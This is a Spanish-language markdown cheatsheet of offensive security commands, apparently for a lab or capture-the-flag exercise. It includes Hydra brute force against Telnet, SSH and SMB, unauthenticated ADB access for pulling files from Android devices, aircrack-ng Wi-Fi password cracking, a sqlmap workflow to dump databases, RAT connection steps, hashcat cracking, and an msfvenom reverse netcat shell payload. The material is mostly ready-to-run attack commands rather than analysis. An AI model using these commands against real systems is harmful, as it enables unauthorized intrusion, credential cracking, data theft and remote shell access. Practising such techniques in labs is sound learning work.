Mys notes and chetsheets markdwon

 


# Cheatsheet de Comandos :)


## Escaneo de Red

1. **Escanear puertos comunes en una subred:**

   ```bash

   nmap -p 22,23,80,3389 192.168.10.0/24

   ```


2. **Escaneo completo de puertos:**

   ```bash

   nmap -p- 192.168.10.0/24

   ```


3. **Escaneo específico para SMB:**

   ```bash

   nmap -p 139,445 --open -sV 192.168.10.0/24

   ```


4. **Escaneo de puertos específicos para servicios sospechosos:**

   ```bash

   nmap -p 9871,6703 192.168.10.0/24

   ```


## Ataques con Hydra

1. **Fuerza bruta para Telnet:**

   ```bash

   hydra -L user.txt -P pass.txt 192.168.10.0 telnet

   ```


2. **Fuerza bruta para SSH:**

   ```bash

   hydra -L user.txt -P pass.txt 192.168.10.0 ssh

   ```


3. **Fuerza bruta para SMB:**

   ```bash

   hydra -L user.txt -P pass.txt 192.168.10.0 smb

   ```


## ADB para Android

1. **Buscar dispositivos en la red:**

   ```bash

   sudo nmap -p 5555 192.168.10.0/24

   ```


2. **Conectar a un dispositivo Android:**

   ```bash

   adb connect 192.168.10.X:5555

   ```


3. **Buscar archivos en el dispositivo:**

   ```bash

   adb shell

   find /sdcard/ -name "*.jpg" -o -name "*.png"

   ```


4. **Descargar archivos al sistema local:**

   ```bash

   adb pull /sdcard/scan/ ./DaniuxOut/

   ```


## Wireshark y Capturas de Red

1. **Filtrar mensajes MQTT Publish:**

   ```plaintext

   mqtt.msgtype == 3

   ```


2. **Filtrar paquetes dirigidos a una IP específica:**

   ```plaintext

   ip.dst == 192.168.10.10

   ```


3. **Analizar conversaciones IPv4:**

   - **Wireshark:**  

     `Statistics > Conversations > IPv4 tab`


## Aircrack-ng

1. **Listar redes inalámbricas desde una captura:**

   ```bash

   airodump-ng DaniuxOut.cap

   ```


2. **Fuerza bruta de contraseña Wi-Fi con Aircrack-ng:**

   ```bash

   aircrack-ng -b 6c:24:a6:3e:01:59 -w '/path/to/wifipass.txt' '/path/to/DaniuxOut.cap'

   ```


## SQLMap

1. **SQL Injection con archivo de parámetros interceptados:**

   ```bash

   sqlmap -r DaniuxOut.txt --dbs

   sqlmap -r DaniuxOut.txt -D database_name --tables

   sqlmap -r DaniuxOut.txt -D database_name -T table_name --columns

   sqlmap -r DaniuxOut.txt -D database_name -T table_name -C column_name --dump

   ```


2. **SQL Injection con crawling:**

   ```bash

   sqlmap -u "http://192.168.10.0" --crawl=3 --level=5 --risk=3

   ```


## RAT

1. **Buscar y conectarse a un puerto RAT:**

   - **Escaneo inicial:**

     ```bash

     nmap -p 9871,6703 192.168.10.0/24

     ```

   - **Cliente RAT (interfaz gráfica):**

     ```plaintext

     Ejecutar cliente RAT, ingresar IP y conectar.

     ```


2. **Buscar archivos usando CMD en el cliente RAT:**

   ```cmd

   dir /b/s "archivo*"

   ```


## VeraCrypt

1. **Montar un volumen cifrado:**

   - Abre VeraCrypt y selecciona el archivo:

     ```plaintext

     C:\Secret

     ```

   - Ingresa la contraseña descifrada.


2. **Buscar archivo dentro del volumen montado:**

   ```bash

   find / -name Confidential.txt

   ```


3. **Leer contenido del archivo:**

   ```bash

   cat /ruta/Confidential.txt

   ```


## Crackeo de Hashes

1. **Identificar tipo de hash:**

   ```bash

   hash-identifier

   ```


2. **Crackear hash con Hashcat:**

   ```bash

   hashcat -m 0 DaniuxOut.txt /path/to/wordlist.txt

   ```


3. **Opcional: Uso de servicios en línea:**

   - [https://hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash)


## Herramientas Adicionales

1. **Steghide para extraer datos ocultos:**

   ```bash

   steghide extract -sf DaniuxOut.jpg

   ```


2. **Buscar archivos ELF con alta entropía:**

   ```bash

   ent archivo.elf

   ```


3. **Generar shell reversa con Metasploit:**

   ```bash

   msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.10.1 LPORT=4444 -f raw > DaniuxOut.sh

   ```


Comentarios